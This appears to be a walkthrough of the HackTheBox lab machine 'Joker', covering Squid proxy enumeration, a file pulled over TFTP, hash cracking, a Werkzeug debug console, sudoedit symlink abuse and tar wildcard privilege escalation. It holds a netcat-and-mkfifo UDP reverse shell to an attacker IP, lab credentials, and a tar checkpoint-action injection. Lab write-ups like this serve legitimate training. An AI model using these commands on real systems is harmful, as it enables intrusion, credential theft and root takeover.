HackTheBox - Joker

Nmap scan results

Looks like there are just these two ports opened. We know about SSH and there is a http proxy running on port 3128. This proxy is widely used for filtering web requests. You can set it up for your own network if you want.

Squid is a caching and forwarding HTTP web proxy. It has a wide variety of uses, including speeding up a web server by caching repeated requests, caching web, DNS and other computer network lookups for a group of people sharing network resources, and aiding security by filtering traffic.

I will keep a UDP Port scan running in the background and proceed further with the squid enumeration.

nmap -sU -sV -sC -n -F -T4 10.10.10.21

Enumerating SQUID Proxy

This is the proxy running on 3128 and we need the access the webserver present behind. I will be using Foxy Proxy to create the proxy.

Now if we try to access the webserver, we will get the following error saying Sorry, you are not currently allowed to request http://10.10.10.21/ from this cache until you have authenticated yourself.

I tried default usernames and passwords but that didn't work. So let's proceed with the UDP port scan that we kept running the background.

Working with TFTP Server

Trivial File Transfer Protocol is a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host. One of its primary uses is in the early stages of nodes booting from a local area network.

The file server doesn't require authentication that means we can just download or upload. I will use tftpy module written in python to enumerate the service. We need squid.conf to get all the details about the cache server.

pip install tftpy

69/UDP TFTP/Bittorrent-trackerHackTricks

import tftpy
client = tftpy.TftpClient('10.10.10.21', 69)
client.download('/etc/squid/squid.conf','/tmp/squid.conf',timeout=5)

This will download the squid.conf file from the target server and stored it in /tmp/squid.conf

Password file located in /etc/squid/ .Let's get that file using the same method.

client.download('/etc/squid/passwords','/tmp/passwords',timeout=5)

kalamari:$apr1$zyzBxQYW$pL360IoLQ5Yum5SLTph.l0

Hash cracking with JohnTheRipper

Now that we have the password, we can surf the webserver with these credentials. Save the username and password in the Foxy Proxy settings. We can also access localhost now.

Shorty running at localhost

Scanning localhost with ffuf

ffuf -x http://kalamari:ihateseafood@10.10.10.21:3128 -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -u http://127.0.0.1/FUZZ -c

OK now we have Werkzeug console where we can potentially run system commands or even get a reverse shell.

Since this is not the best debugging environment, Werkzeug provides a WSGI middleware that renders nice tracebacks, optionally with an interactive debug console to execute code in any frame. ... Danger. The debugger allows the execution of arbitrary code which makes it a major security risk.

Getting UDP Reverse shell

I tried getting reverse shell but the server didn't respond after that and I had to reset the machine to get it working again. So I eventually checked for iptables config for IPv4.

# Generated by iptables-save v1.6.0 on Fri May 19 18:01:16 2017
*filter
:INPUT DROP [41573:1829596]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [878:221932]
-A INPUT -i ens33 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i ens33 -p tcp -m tcp --dport 3128 -j ACCEPT
-A INPUT -i ens33 -p udp -j ACCEPT
-A INPUT -i ens33 -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A OUTPUT -o ens33 -p tcp -m state --state NEW -j DROP
COMMIT
# Completed on Fri May 19 18:01:16 2017

So by looking at this, I realized that the network will DROP all the outgoing packets. We have udp in scope where we can try to get shell via UDP. I found this trick that is much more easy to understand.

# My local machine
nc -nvulp 1234 

# Attacker's machine
mkfifo /tmp/akshay
nc -u 10.10.14.5 1234 < /tmp/akshay | { echo "Hi from another side"; bash; } > /tmp/akshay

os.system("mkfifo /tmp/akshay")
os.system('nc -u 10.10.14.5 1234 < /tmp/akshay | { echo "Hi from another side"; bash; } > /tmp/akshay')

Exploiting sudoedit vulnerability

There is local privilege escalation vulnerability in sudoedit. We can check the version of sudoedit using dpkg command. Read more about the vulnerability over here.

Explanation

sudoedit will use the nano editor to edit/modify the file given as an argument. We can leverage this by creating a symlink to a file which is neither readable or writable by us. In this machine, we will write our SSH public key to alekos account by exploiting this vulnerability.

sudoedit -u alekos /var/www/testing/test1/layout.html

And we will write the SSH Public key to that file and save it. Now if you will check, our contents will get successfully added into authorized_keys file.

Privilege Escalation (Method 1)

First method will be to use Normal Tar Wildcard Injection.

• https://gtfobins.github.io/gtfobins/tar/
• https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
• https://book.hacktricks.xyz/linux-unix/privilege-escalation/wildcards-spare-tricks

A cron job is running every 5 minutes backing up all the files in development directory to backup directory.

# Contents of shell.sh file
#!/bin/bash

cp /bin/bash /tmp/bash
chmod +x /tmp/bash

touch /home/alekos/development/"--checkpoint-action=exec=sh shell.sh"
touch /home/alekos/development/"--checkpoint=1"

Now what this thing will do is pass the --checkpoint-action=exec=sh shell.sh and --checkpoint=1 as an argument to tar command, thus resulting into execution of shell.sh file.

Privilege Escalation (Method 2)

Another way is to use symlink again but this time to link it to root directory. Move the development directory to some other place and create a file having a symlink to root directory.

mv development/ development.bak

Now here the tar file will contain everything from the root directory. Isn't that awesome :))

Notice the difference in sizes that means our exploit worked.